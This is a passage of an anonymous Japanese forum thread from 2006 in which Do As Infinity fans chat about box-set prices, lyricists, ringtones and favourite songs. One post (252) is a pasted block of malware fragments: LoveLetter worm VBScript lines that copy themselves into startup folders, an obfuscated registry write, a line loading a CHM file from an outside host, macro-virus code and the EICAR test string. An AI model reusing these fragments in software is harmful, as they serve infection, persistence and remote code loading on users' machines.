確か髭作は徒然とアザヤカだけだろ

189 :伝説の名無しさん:2006/06/24(土) 14:45:41
>>186
どうやったら顔に見えるんだよ

190 :伝説の名無しさん:2006/06/24(土) 15:24:02
・A・

191 :伝説の名無しさん:2006/06/24(土) 15:39:52
D ・A・ I

右手に盾、左手に剣だよなw

192 :伝説の名無しさん:2006/06/24(土) 15:43:02
>>191
プ

193 :伝説の名無しさん:2006/06/24(土) 16:43:50
>>191
ペ

194 :伝説の名無しさん:2006/06/24(土) 19:18:38
Weekもりょーじゃなぃ?

195 :伝説の名無しさん:2006/06/24(土) 20:25:24
D(・A・)I

196 :伝説の名無しさん:2006/06/24(土) 20:43:35
>>191
(゚д゚)ポカーン

197 :伝説の名無しさん:2006/06/24(土) 21:55:41
>>191
どうみてもそうはみえないし、無理矢理だろww

198 :泳ぐなネッシー ◆XoXdlHAiq6 :2006/06/24(土) 22:13:53
Do The Box、amazonで遂に5,000円に突入...。

199 :伝説の名無しさん:2006/06/24(土) 22:41:44
3000円になったら買ってもいい。DVD目当てで

200 :伝説の名無しさん:2006/06/25(日) 11:28:48
まじかよ・・・。一万で買った俺は馬鹿ですね。

201 :伝説の名無しさん:2006/06/25(日) 12:09:18
new world(We are.収録版)聞いた。

なんつうか、アルバムで再アレンジされて良かった。
何だあの間奏。

202 :伝説の名無しさん:2006/06/25(日) 12:10:14
>>201
まず下げろyp

203 :伝説の名無しさん:2006/06/25(日) 12:10:38
>>198
待ったかいがあったw

204 :伝説の名無しさん:2006/06/25(日) 12:12:34
CD1枚辺り1000円かw

205 :伝説の名無しさん:2006/06/25(日) 12:56:02
>>204
おまけDVDの価値も含めてやれよw

206 :伝説の名無しさん:2006/06/25(日) 13:04:00
>>204
5000÷6=1000???

207 :伝説の名無しさん:2006/06/25(日) 13:11:32
>>205
あくまで、おまけだしなぁw

>>206
CD枚数5枚と勘違いしてた
1000円切るのなw

208 :伝説の名無しさん:2006/06/25(日) 14:23:05
くそ〜1万で買った俺はバカか。最低だなエイベは。
もう二度とこの会社のアーティストは好きにならん

209 :伝説の名無しさん:2006/06/25(日) 14:36:12
エイベじゃなくてアマゾンが値下げしてんだろうよ

210 :伝説の名無しさん:2006/06/25(日) 14:39:01
発売してまだ3ヶ月ちょいなのにもう半額になるのってどんだけ人気無(ry

211 :伝説の名無しさん:2006/06/25(日) 15:20:12
>>208
お門違いの逆ギレもいいところだな

212 :伝説の名無しさん:2006/06/25(日) 23:13:58
>>210
アマゾンは1万越えする商品はすぐに値下げするよ
映画のDVD-BOXとかはそれ待つのが吉。

213 :伝説の名無しさん:2006/06/26(月) 00:18:00
>208
Amazonで7,000円で買いましたが。1ヶ月後に2,000円も値下げかよ。


214 :伝説の名無しさん:2006/06/26(月) 08:17:05
最終的に4500円ぐらいまで下がりそうだな

215 :伝説の名無しさん:2006/06/26(月) 17:45:43
久々にここ見たら吹いた。アマゾン半額てw
どんだけ人気な(ry
1万円でしかも傷入り掴まされた俺は阿呆か。

阿部糞の仕業だったら笑えたのにな。毎度のことだから。

216 :伝説の名無しさん:2006/06/26(月) 19:44:50
>>213
仲間w
俺は買って一週間後で1000円値下げ…

217 :伝説の名無しさん:2006/06/26(月) 20:36:22
もう一ヶ月したら3000円ぐらいになってそうだwww
お前ら買わないで待ち続けたらどこまでも下がるぞww

218 :伝説の名無しさん:2006/06/26(月) 21:45:21
ただ今BOXの値下がりがフルスピードで限界目指してますw

219 :伝説の名無しさん:2006/06/26(月) 22:33:17
>>218
未来へ向かって…か

輝かしい未来ではなさそうだ…

220 :伝説の名無しさん:2006/06/26(月) 23:00:00
感無量

221 :伝説の名無しさん:2006/06/26(月) 23:09:31
BOXを借りて7000円で売る

4000円で買い戻して、返す

ウマー

222 :伝説の名無しさん:2006/06/26(月) 23:51:17
これ5000円で買ってブクオフ行ったら7000円以上で買い取ってくれるだろうな

223 :伝説の名無しさん:2006/06/27(火) 00:09:28
>>222
良いこと聞いた

224 :伝説の名無しさん:2006/06/27(火) 01:50:16
作詞がD・A・I表記のころ誰が作詞したか全然わからないのって俺だけかな?
亮くん以外と女っぽい歌詞書いてる気がするんだけど気のせい?


冒険者たちと閉店って亮くん?

225 :伝説の名無しさん :2006/06/27(火) 02:21:38
BD〜GOHの廉価版
Do The Best+DVD
Do The Best5000枚限定ピクチャーCD
NYLのTシャツ
B-SideのTシャツ
Do The Box
Do The Best Supporters Collection

のアイテムはマジいらんかったな。DoAsをこれでもかってほど安っぽくさせた連中だよ。

226 :伝説の名無しさん:2006/06/27(火) 03:24:30
>>224
かなりオレの主観頼みの分析だが

韻を踏ませている、青臭い、何となくしつこい感じ→亮
独特の言葉言い回し、ストーリー系、反戦系→原田さんor新地さん
基本柔らかめの表現、中身が難しそうで実はそうでもない→伴ちゃん

な傾向がある気がシス

閉店は亮だけど冒険者は見た感じ原田さんかな?

227 :伝説の名無しさん:2006/06/27(火) 03:58:10
GOHって最後の感謝祭が余計だな・・・科学で終われば良かったのにorz

228 :伝説の名無しさん:2006/06/27(火) 18:02:15
>>225
NYLのTシャツ付きってどこの店でも余ってる気がするw



229 :伝説の名無しさん:2006/06/27(火) 18:05:37
Tシャツもってるのいるのか?w
買ったところでいつ着るのか…

230 :228:2006/06/27(火) 18:07:01
なんか無駄な改行してしまったスマン

231 :伝説の名無しさん:2006/06/27(火) 18:52:22
>>225
TSとGOHは廉価版になってやっと安心して買える様になった訳だが・・・CCCDなんか恐ろしくて買えん。

232 :伝説の名無しさん:2006/06/27(火) 18:58:39
LIVE CDの方がいらなかった
Do The LiveはDVDで出せばよかった

233 :伝説の名無しさん:2006/06/28(水) 00:31:21
>>227
それはそれで暗い終わり方でいやだな

234 :伝説の名無しさん:2006/06/28(水) 17:58:13
感謝日おれは好きだけどな

235 :伝説の名無しさん:2006/06/28(水) 19:26:04
いきなり打ち込みサウンドは浮く
NWあたりなら違和感無いかもしれないがGOHじゃな

236 :伝説の名無しさん:2006/06/28(水) 22:10:46
科学もそれほど変わらないと感じる。

237 :伝説の名無しさん:2006/06/28(水) 22:15:40
要は曲調だろ。
科学の後にいきなりあんな底抜けポップな音で「ピロリロリロリロピロリロリロリロ」ってやられちゃぁな。

238 :伝説の名無しさん:2006/06/28(水) 22:29:39
>>237
撲殺天使ドクr…いや、なんでもない。

239 :伝説の名無しさん:2006/06/28(水) 22:33:00
科学は、イントロの音色に意味があるしな。
あのちょっと不気味さも醸し出してる、いかにも「科学の」って感じの。

240 :伝説の名無しさん:2006/06/28(水) 22:47:57
最後の埋め合わせに適当にアップテンポいれてみたって感じしかしないよな
サマデイやあいのうたと比べるとイマイチ盛り上がりに欠けるし
他のバラード締めは完璧だがな

241 :伝説の名無しさん:2006/06/29(木) 04:30:52
最後明るく終わってていいと思うよ。
感謝祭って言うテーマもラストにあってる。
曲だけで見たら好きじゃないけど。
科学で終わるのはやだな。何か後味が悪いw
ラストのバラードはBODのY&Tみたいな感じならいいんだけど。

242 :伝説の名無しさん:2006/06/29(木) 12:31:52
5000円ってことで買ったぞDo the Boxw
まだまだ安くなりそうだが。
シリアルは8200番台

243 :伝説の名無しさん:2006/06/29(木) 16:30:25
1万セットも売れるとおもったのか

244 :伝説の名無しさん:2006/06/29(木) 16:47:49
最後はField of dreamsにすれば良かったと思う。
科学の夜は暗いがこれは感動する。

245 :伝説の名無しさん:2006/06/30(金) 12:39:40
>>244
ビデオクリップDVD「8」はそうなってるな。

246 :泳ぐなネッシー ◆XoXdlHAiq6 :2006/06/30(金) 21:49:31
>>242
ち、ちょっと待て、6,000円の時に買ったオレは8300番台...

247 :伝説の名無しさん:2006/06/30(金) 22:19:08
俺は6000円のとき900番台だったけどな。

248 :伝説の名無しさん:2006/06/30(金) 23:36:03
俺は135だったけどな

249 :伝説の名無しさん:2006/06/30(金) 23:52:14
>>248
スゴスw


他にここ見てるヤシで一桁とかキリ番とかいるのかな?

250 :伝説の名無しさん:2006/07/01(土) 10:28:05
釣りだろ。

251 :伝説の名無しさん:2006/07/01(土) 10:31:31
ところでPIA SUPER LIVE GROOVEいくひといる??
つーかなんであれって17歳以下はだめなの??
俺応募できないんだけどorz
ごまかしてもバレないよな、今考えてみれば。ギリギリ17だし。
おうぼすりゃよかった。


252 :伝説の名無しさん:2006/07/01(土) 12:58:00
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ


253 :伝説の名無しさん:2006/07/01(土) 18:25:12
>>251
書き過ぎ

254 :伝説の名無しさん:2006/07/01(土) 19:58:06
というより恐ろしく過疎ってるな…
これ全部埋めるのにあと3ヵ月はかかりそう

255 :伝説の名無しさん:2006/07/02(日) 00:52:22
みんな再結成ライブがどうとか言ってるけど
普通解散したグループって復活するものなの?
スピードとか米米クラブとかぐらいしか知らないんだけど

256 :伝説の名無しさん:2006/07/02(日) 01:20:05
>>255
つTMN

257 :伝説の名無しさん:2006/07/02(日) 01:34:47
スピッツの新曲は魔法のコトバ

258 :伝説の名無しさん:2006/07/02(日) 10:43:53
「あいのうた」って名前の曲は多い気がする…

259 :伝説の名無しさん:2006/07/02(日) 18:51:18
AmazonでBOX値上げしてるのはなぜ?

260 :伝説の名無しさん:2006/07/02(日) 20:14:37
>>259
在庫がなくなってきたのでは?

261 :伝説の名無しさん:2006/07/02(日) 20:31:06
ここの人たちって着信DAIの曲にしたりしてるの?
DAIを着信にしてみようと思って無料サイト探してみたけどなかなかないorz

262 :伝説の名無しさん:2006/07/02(日) 20:37:03
つ自作

263 :伝説の名無しさん:2006/07/02(日) 22:12:14
値上げしたら買う人減るよね

264 :伝説の名無しさん:2006/07/02(日) 22:20:10
>>261
うたうた倉庫
着うた支店

265 :261:2006/07/03(月) 01:28:39
>>264
トンクス

266 :伝説の名無しさん:2006/07/03(月) 14:52:57
ラストライブDVD隠し扉とかないの?

267 :伝説の名無しさん:2006/07/04(火) 00:00:59
人生でも失敗した事の一つ:Do The BOXを買ってしまった事。

268 :伝説の名無しさん:2006/07/04(火) 01:04:59
引退してからファンになった俺としては丁度よかったんだが
前からのファンにとっては微妙らしいね

269 :伝説の名無しさん:2006/07/04(火) 02:11:52
あれは伴ちゃんが柊のことを楓
って言ってしまう映像だけでも見る価値がある

270 :伝説の名無しさん:2006/07/04(火) 02:34:55
おかぁーさぁーんも収録してくれれば…

271 :伝説の名無しさん:2006/07/04(火) 03:17:59
何故柊を楓と………楓だとスピッt(ry

272 :伝説の名無しさん:2006/07/04(火) 18:59:47
全て幻になればいい

273 :伝説の名無しさん:2006/07/04(火) 20:15:32
伴ちゃんはサッカー楽しんでるかな

274 :伝説の名無しさん:2006/07/04(火) 23:58:32
なんだーい?なんだーい?


では、また。

275 :伝説の名無しさん:2006/07/05(水) 19:32:16
age

276 :伝説の名無しさん:2006/07/05(水) 19:45:02
昨日ようやくI miss you?を聴けたのだがかなり良いな

277 :伝説の名無しさん:2006/07/05(水) 20:50:56
>>276
だろ

278 :伝説の名無しさん:2006/07/05(水) 20:55:40
アイミスって詞と曲がかみ合ってないような気がするのはオレだけか?
特にサビの張り上げるとこがアホっぽく(ry

279 :伝説の名無しさん:2006/07/06(木) 02:51:34
ライヴを見ないとDo Asの良さはわからないってホントですか?

280 :伝説の名無しさん:2006/07/06(木) 06:54:19
>279
んなこたぁない


281 :伝説の名無しさん:2006/07/06(木) 13:23:28
Oasisを聴かないとDo Asの良さはわからないってホントですか?

282 :伝説の名無しさん:2006/07/06(木) 13:39:48
>>268
ちょwww引退って。誰がだよw

283 :伝説の名無しさん:2006/07/06(木) 14:38:37
>>282
たぶん中田ww

284 :伝説の名無しさん:2006/07/06(木) 17:28:08
むしろライブで失望するぞDoAsは
ところでrumble fishって曲も多いけど、日本語だとどういう意味?

因みに俺はDoAsの着メロはヤマハ メロっちゃがオススメ
有料だけど315円で取り放題
音がかなり綺麗
ミュウモなら全曲揃ってる

業者じゃないよ^^;

285 :伝説の名無しさん:2006/07/06(木) 20:19:53
>>284
rumbleって雷とかが音をたてるとかいう意味じゃなかったかな。
でも音をたてる魚って意味わかんないし歌詞に全然合ってないよね。
なんか違う意味があるのかな(´・ω・`)

286 :伝説の名無しさん:2006/07/06(木) 21:04:05
rumble fishは互いを攻撃しあう魚だと聞いた
ぐぐればその魚の画像とか出てくる

287 :伝説の名無しさん:2006/07/06(木) 21:13:43
>>286
軽く調べてみたら喧嘩するって意味もあるんだね(´・ω・`)

288 :伝説の名無しさん:2006/07/06(木) 22:24:00
ライブで伴の歌を聴くとハラハラするな

289 :伝説の名無しさん:2006/07/06(木) 22:53:45
ハラハラって言うかsunとか全然声が出せてない

290 :伝説の名無しさん:2006/07/06(木) 23:15:29
参完璧に歌えたらカッコイイと思うけどな

291 :伝説の名無しさん:2006/07/06(木) 23:33:51
>>284
ベタっていう魚。日本語では闘魚だかなんとか…
うちで飼ってるw

292 :伝説の名無しさん:2006/07/06(木) 23:45:29
>>284
メロっちゃは94円でも取り放題できるよ

と、Do Asに無関係なところにつっこんでみるw

293 :伝説の名無しさん:2006/07/07(金) 16:03:28
>>292
そうだった。。。昔DLしたから忘れてた。
今のDAIの着メロ殆んどメロっちゃだけど、メロっちゃが1番DAIの曲の雰囲気をうまく再現してるような気がして気に入っている。
94円で取り放題ってのもいい。

294 :伝説の名無しさん:2006/07/07(金) 17:06:26
と言うかみんなレスありがと!
ベタって綺麗な魚だね^^

295 :伝説の名無しさん:2006/07/07(金) 18:33:39
ファイナルのDVDは必ずTシャツが付くの?

296 :伝説の名無しさん:2006/07/07(金) 20:12:10
>>295
Tシャツ付きは初回のみだった希ガス
詳しくはオフィ見た方がいい

297 :伝説の名無しさん:2006/07/08(土) 06:06:06
レスd

298 :伝説の名無しさん:2006/07/08(土) 10:23:37
>>284
メロっちゃ( ゚д゚)人(゚д゚ )ナカーマ

299 :伝説の名無しさん:2006/07/08(土) 20:15:00
永遠の詞が心に染みる歳になりました。

300 :伝説の名無しさん:2006/07/09(日) 06:33:09
マジで永遠なんて期待外れ

301 :伝説の名無しさん:2006/07/09(日) 06:46:40
そういや活動中のスレタイはネガティブなもの多かったなw

302 :伝説の名無しさん:2006/07/09(日) 11:29:37
>>220
>>221

何この間

303 :伝説の名無しさん:2006/07/09(日) 11:55:46
みちたろーって誰?

304 :伝説の名無しさん:2006/07/09(日) 21:03:44
>>303
ミッチーの前にGTBでベースやってた人

305 :伝説の名無しさん:2006/07/09(日) 21:16:34
>303 Name: 伝説の名無しさん [] Date: 2006/07/09(日) 11:55:46 ID: Be:
>    みちたろーって誰?
>304 Name: 伝説の名無しさん [sage] Date: 2006/07/09(日) 21:03:44 ID: Be:
>    >>303
>    ミッチーの前にGTBでベースやってた人

ちょwwwww



306 :伝説の名無しさん:2006/07/09(日) 22:02:40
道長太郎

307 :伝説の名無しさん:2006/07/09(日) 22:41:52
今、The Turtlesっていうバンドでベース弾いてるよね。みちたろー

308 :伝説の名無しさん:2006/07/10(月) 01:44:22
under the moon聴いてると死にたくなってくるんだが…
未だに好きになれないな

309 :伝説の名無しさん:2006/07/10(月) 07:58:18
でもサンよりは結構オレは好きだけど

310 :伝説の名無しさん:2006/07/10(月) 08:39:56
ムーンってDo Asにしては異色系だよな。ちょっとCoccoっぽい

311 :伝説の名無しさん:2006/07/10(月) 14:51:34
やばいネタはやめろ。

312 :304:2006/07/10(月) 20:02:36
Σヾ(○Д○;)ノ
今更ながら誤爆に気付いた…
ミッチーじゃなくてヨッシーだった…
スマソ

313 :伝説の名無しさん:2006/07/11(火) 00:20:05
ラストライブで(DVD見るとわかるけど)
伴ちゃんが「ミッチー、ヨッシー」って二人を紹介してます。
(逆だったかもしれない)

314 :伝説の名無しさん:2006/07/11(火) 00:24:37
>>308-310
別に死にたくならなくても…と思ったり
確かに「誇れない世界なんて、君がいたとしても生きる意味もない」って歌詞にあるけどさ

私的には伴ちゃんのファルセットが一番映える曲だと思う

315 :伝説の名無しさん:2006/07/11(火) 00:58:51
>>181
「音の無い世界なんて」じゃね?

316 :伝説の名無しさん:2006/07/11(火) 09:17:53
>>315
志村ー、アンカアンカ

moonは伴ちゃんの声に酔いしれるから死にたくはならない
アヴェ・マリアよりは

317 :伝説の名無しさん:2006/07/11(火) 13:58:02
マリア〜〜愛〜〜し〜〜て〜〜〜〜♪
死〜ぬ〜〜〜ま〜〜でぇ〜〜〜♪騙〜〜〜し〜〜〜て〜〜〜〜〜♪

318 :伝説の名無しさん:2006/07/11(火) 21:25:51
>>317
何その曲

319 :伝説の名無しさん:2006/07/12(水) 00:03:21
ジャンヌの曲だろ。伴スレにも出没してたリア厨か

320 :伝説の名無しさん:2006/07/12(水) 12:25:21
自演乙。

321 :伝説の名無しさん:2006/07/12(水) 15:28:01
ネタが何もないな。

322 :伝説の名無しさん:2006/07/12(水) 15:38:08
殺意にも似た

323 :伝説の名無しさん:2006/07/12(水) 21:49:32
川 ̄ー ̄川<殺意にもニタ+

324 :伝説の名無しさん:2006/07/12(水) 22:34:24
ドゥアズで一番嫌いな曲って何?
ちなみに俺は完璧おn(ry

325 :伝説の名無しさん:2006/07/12(水) 23:04:38
>>324
それ言っちゃダメだってw(地底人風)

作詞した人、泣いちゃうかも知れないでしょ。
自分に対する応援歌なのに…
http://www.barks.jp/feature/?id=1000005594&p=1

326 :325:2006/07/12(水) 23:06:07
書き込みボタン押してから気がついた…
もしかして俺は勘違いしているのではないかと…

327 :伝説の名無しさん:2006/07/13(木) 00:16:27
川 ̄凵P川<誤爆乙

328 :伝説の名無しさん:2006/07/13(木) 11:09:51
殺意にも似た愛情掻き集め

329 :伝説の名無しさん:2006/07/13(木) 14:41:58
魔法のコトバって何に使われてるっけ?思い出せない・・・。

330 :伝説の名無しさん:2006/07/13(木) 15:43:41
>>329
スピッツ?

331 :伝説の名無しさん:2006/07/13(木) 16:31:27
>>329
ショコラ?

332 :伝説の名無しさん:2006/07/13(木) 16:32:24
ショコラ

333 :伝説の名無しさん:2006/07/13(木) 19:36:50
じゃあショコラ

334 :伝説の名無しさん:2006/07/13(木) 20:55:14
>>325
それはガンパレ伴ちゃんでしょ。
>>324が言ってるのはPerfectLadyのことじゃないかと。
あれは亮くん作詞な気がする。
あれ以外のTSの曲は好きなんだけど……(´・ω・`)

335 :伝説の名無しさん:2006/07/13(木) 21:06:50
Ftfがダントツで嫌い

336 :伝説の名無しさん:2006/07/13(木) 21:31:11
完璧女か
結構オレは好きだが(´・ω・`)ショボーン

337 :伝説の名無しさん:2006/07/13(木) 22:05:32
髭詞なら楽園はガチで良い

338 :伝説の名無しさん:2006/07/13(木) 22:51:57
俺は髭の最高傑作は「遠くまで」かな

あと、ftfは駄曲だと思ってたが
最近あらためて聞いてみたところ、悪くない気がしてきた
ただ、アルバムの中の一曲としてはいいけど
シングルの中では確実に浮いてる

339 :伝説の名無しさん:2006/07/14(金) 00:37:33
泣かないで僕だって独りなんだよって髭が書いたなんて信じられないくらい沁みる

340 :伝説の名無しさん:2006/07/14(金) 00:49:29
「遠くまで」のPVの最後、伴ちゃんが死んだのかと思ってた…

あれは、最後の戦闘で落としてしまったペンダントを伴ちゃんが見つけて拾ってる
っていう意味みたい…

341 :伝説の名無しさん:2006/07/14(金) 00:55:08
あれ拾ったのヒゲかと思ってたよ
なるほどね、ペンダント拾って戦争も終わりってわけね。

342 :伝説の名無しさん:2006/07/14(金) 00:55:29
そうだったのか・・・
どこ情報でつか?

343 :伝説の名無しさん:2006/07/14(金) 07:13:51
髭と伴の2種類あるハズ

344 :伝説の名無しさん:2006/07/14(金) 08:29:39
>>343
そういうことだったんでつか、
最後のテロップが違うってのは。

オフィにメイキングのページだけ残ってるんだよね。直リンしないと見れないけど
http://www.d-a-i.com/issue/faraway_pv/index.htm

345 :伝説の名無しさん:2006/07/14(金) 11:02:31
TAOのイントロのピアノって神とまでは行かないけど、メチャ良くない?
最近、聞いてて気が付いた

346 :伝説の名無しさん:2006/07/14(金) 13:36:23
ライブだと音下げてるし、どちらかというとギターが前に出てるからあまりピアノが目立たなかったね。
シングルみたいに間奏とかもっとピアノが前に出てほしかったな。

347 :伝説の名無しさん:2006/07/14(金) 13:52:49
確かにタオのイントロは鳥肌ものだな。なんで売れなかったのが不思議なくらいだ。
アレンジした亀ちゃん d(・∀・ )GOOD JOB!!!!

348 :伝説の名無しさん:2006/07/14(金) 14:49:10
田尾のギターソロもいいよ

349 :伝説の名無しさん:2006/07/14(金) 15:13:18
いや、田尾はギター弾けないよ。

350 :伝説の名無しさん:2006/07/14(金) 15:32:51
>>349
わろすw

351 :伝説の名無しさん:2006/07/14(金) 19:34:11
最近Do Asの携帯待ち受けばっか集めてる。
あとチョイで300枚超える。

352 :伝説の名無しさん:2006/07/14(金) 21:45:10
>>351
そんなあなたの待ち受けベスト3をうp

353 :伝説の名無しさん:2006/07/14(金) 22:15:16
他サイトから貰ったやつとかは貼れないけどドゾ

http://u.pic.to/2gxik

354 :伝説の名無しさん:2006/07/14(金) 23:39:13
あれ?伴ちゃん美人じゃね?

355 :伝説の名無しさん:2006/07/14(金) 23:45:21
カメラマンうまくね?

356 :伝説の名無しさん:2006/07/15(土) 00:03:49
ラビナスのCMなつかしくね?

357 :ザ・釣り人 ◆HbpyZQvaMk :2006/07/15(土) 02:09:09 ?#

おまいらのために立てといた

【音楽】gooが「a-nation'06」出演アーティストの楽曲とライブ映像を無料配信!
http://live14.2ch.net/test/read.cgi/wildplus/1152896354/l50



358 :伝説の名無しさん:2006/07/15(土) 07:13:26
DAI関係ないじゃん

359 :伝説の名無しさん:2006/07/15(土) 07:59:03
また、倖田來未、Do As Infinity、「2005年 a-nation」のダイジェスト版も
期間限定で無料配信される。
こちらの配信期間は7月16日〜7月23日となる。


360 :伝説の名無しさん:2006/07/15(土) 14:06:24
>>353
ラビナスの伴ちゃん細キレカッコ可愛いな。

361 :伝説の名無しさん:2006/07/15(土) 15:55:11
それ言ったら今の伴ちゃんは…… _| ̄|○

362 :伝説の名無しさん:2006/07/15(土) 17:06:33
DAIのドラムは生ドラムだと大体の場合で
「トンストントトントン」ってリズムを刻んでいるのに気付いた
なんかワンパターンすぎないか?

363 :伝説の名無しさん:2006/07/15(土) 17:37:12
>>353
パス何?

364 :伝説の名無しさん:2006/07/15(土) 18:28:36
ごめん。もういいかなと思って鍵かけちゃった。
解除します。

365 :伝説の名無しさん:2006/07/16(日) 15:15:23
何ですぐ過疎るかな…
あげ

366 :伝説の名無しさん:2006/07/16(日) 16:28:35
話すべきネタは出尽くしたから仕方ないぜよ

367 :伝説の名無しさん:2006/07/16(日) 18:19:40
解散したのに勢いよくレスがつくほうが異常

368 :伝説の名無しさん:2006/07/16(日) 19:27:38
mellow amberの901用の着うた欲しいんですけどありませんか??


369 :伝説の名無しさん:2006/07/17(月) 02:22:28
過疎か

370 :伝説の名無しさん:2006/07/17(月) 10:29:03
じゃぁDAI解散後よく聴くようになったアーティストでも挙げる?


371 ::2006/07/17(月) 11:15:22
伴都美子

372 :伝説の名無しさん:2006/07/17(月) 13:46:46
Do As Infinity

373 :伝説の名無しさん:2006/07/17(月) 14:19:00
ミサイルイノベーション

374 :伝説の名無しさん:2006/07/17(月) 15:56:19
大渡亮

375 :伝説の名無しさん:2006/07/17(月) 16:11:44
ttp://www.horiproosaka.com/profile/kotomi.html

376 :伝説の名無しさん:2006/07/17(月) 18:04:29
FREENOTE

377 :伝説の名無しさん:2006/07/17(月) 20:37:37
密林からメールきたのだが
BOX余って邪魔なんだろうな

378 :伝説の名無しさん:2006/07/17(月) 23:32:37
久しぶりにサポーターベスト聞いたけど
やっぱりファン投票1位があいのうたって納得いかないな(´・ω・`)

379 :伝説の名無しさん:2006/07/18(火) 00:18:40
Do The Best+
[Disk-1]
1.空想旅団 2.SUMMER DAYS 3.本日ハ晴天ナリ 4.遠くまで 5.TAO 
6.陽のあたる坂道 7.ブランコ 8.Desire 9.Heart 10.rumble fish
11.遠雷 12.Week! 13.For the future 14.new world 15.Yesterday&Today

[Disk-2]
1.魔法の言葉(ry 2.Oasis 3.真実の詩 4.135 5.深い森 6.nice&easy
7.under the sun 8.楽園 9.under the moon 10.冒険者たち
11.Tangerine Dream 12.柊 13.菜ノ花畑 14.Welcome! 15.We are.


頑張りますた。

380 :伝説の名無しさん:2006/07/18(火) 02:37:49
>>379
今日からはもう、頑張らなくていいよ^^

381 :伝説の名無しさん:2006/07/18(火) 08:57:53
TAO発売&A-side発売予定発覚から1年か…

スレ住人はauroraの歌詞とA-sideの発売日から、解散を予想してたよな

382 :伝説の名無しさん:2006/07/18(火) 09:24:57
どう見てもにせものだろwwwwwwwwwwwwwwwwwwwwwwwwww
http://page4.auctions.yahoo.co.jp/jp/auction/d63878212

383 :伝説の名無しさん:2006/07/18(火) 21:28:59
>>382
出た、宮城の偽サイン売り
全然伴ちゃんのサインじゃないし

384 :伝説の名無しさん:2006/07/18(火) 21:54:39
>>362
ラルクや事変もそんな感じじゃね?

385 :伝説の名無しさん:2006/07/19(水) 00:06:01
>>381
懐かしいなwww
最近オフィ見てないがA-sideは物議を醸したなwwww

386 :空気嫁:2006/07/19(水) 00:18:23
一気に話変えてみんなの1番好きな曲あげてみよ〜

387 :伝説の名無しさん:2006/07/19(水) 00:18:55
当初、Asideはべ糞の金儲けだ!とか批判されてけど
解散が発表されてから、みんな納得して静かになった
というか、解散が辛いとかラストライブの話ばかりになった

388 :伝説の名無しさん:2006/07/19(水) 00:44:34
俺はもっと早く解散すればよかったって言い続けてたけど

389 :伝説の名無しさん:2006/07/19(水) 00:51:22
チケットと焼肉の話だろ?

390 :伝説の名無しさん:2006/07/19(水) 01:02:32
あの頃の住民はどこへいったのか……今頃他に乗り換えて和気藹々としてるんだろうな(´・ω・`)
でも9/29になったらここのスレもまた祭りと化するのかな

391 :伝説の名無しさん:2006/07/19(水) 03:57:20
>>382
ひどすぎ

392 :伝説の名無しさん:2006/07/19(水) 08:14:43
>>382
伴ちゃんのサインの画像ってググったぐらいじゃ出てこなかった…んで、

一青窈 直筆サイン入り写真
ttp://page9.auctions.yahoo.co.jp/jp/auction/k34115313

恐らく本物
http://web.sfc.keio.ac.jp/~s98351hk/autograph.jpg

うん、なるほど…

393 :空気嫁:2006/07/19(水) 11:39:25
ちなみに俺は冒険者たちだよー

394 :伝説の名無しさん:2006/07/19(水) 12:41:17
>>390
ここにいますが
時々見ている

395 :伝説の名無しさん:2006/07/19(水) 14:23:15
>>390
つ伴スレ

396 :伝説の名無しさん:2006/07/19(水) 15:50:29
科学の夜はアメリカの9.11を歌った曲なの?

397 :伝説の名無しさん:2006/07/19(水) 17:51:56
>>396
9.11はWhat you gonna do?じゃなかったか?

398 :伝説の名無しさん:2006/07/19(水) 19:43:24
科学の夜を
あえて言うなら第3時世界大戦かな…

399 :伝説の名無しさん:2006/07/19(水) 20:11:08
ターミネーターっぽい

400 :伝説の名無しさん:2006/07/19(水) 20:31:12
>>398
そんな大それた事おっぱじめなくても、
ラ・アーグに普通のミサイル撃ち込めばサヨナラですよ。


俺が一番好きなのは…GATES OF HEVENかなぁ…

401 :伝説の名無しさん:2006/07/19(水) 23:00:25
>>397
それ本当?

402 :伝説の名無しさん:2006/07/19(水) 23:10:30
>>400 
ああ、なるほど

瓦礫になったのは再処理工場で、
その上で膝を抱えて眺めてるのは、なんとか助かった工場の従業員だね。

でも、争ってた国境線が消え失せる状態までには至ってないだろうから、やっぱりちょと違うかも

403 :伝説の名無しさん:2006/07/19(水) 23:25:38
焼肉定食なつかしいな。死ねよ。

404 :伝説の名無しさん:2006/07/20(木) 00:24:08
改めてアルバム聴いてみたがBOD、NW、GOHは普通に完成度高いな
DFは聞き苦しい感じが否めない。TS、NYLは論外。

405 :伝説の名無しさん:2006/07/20(木) 00:44:04
TSは空想旅団で燃え尽きてあとぐだぐだ
NYLは単発で聞いたらそこそこ良いのもあるけど流れが悪い

406 :伝説の名無しさん:2006/07/20(木) 01:47:11
>>403
とか言いながらTELしたんだろw

407 :伝説の名無しさん:2006/07/20(木) 14:29:58
いや、残念だけどテルしてないよ。
だって俺アリーナ席普通にファンクラブの人からもらったし。

408 :伝説の名無しさん:2006/07/20(木) 14:33:16
>>402
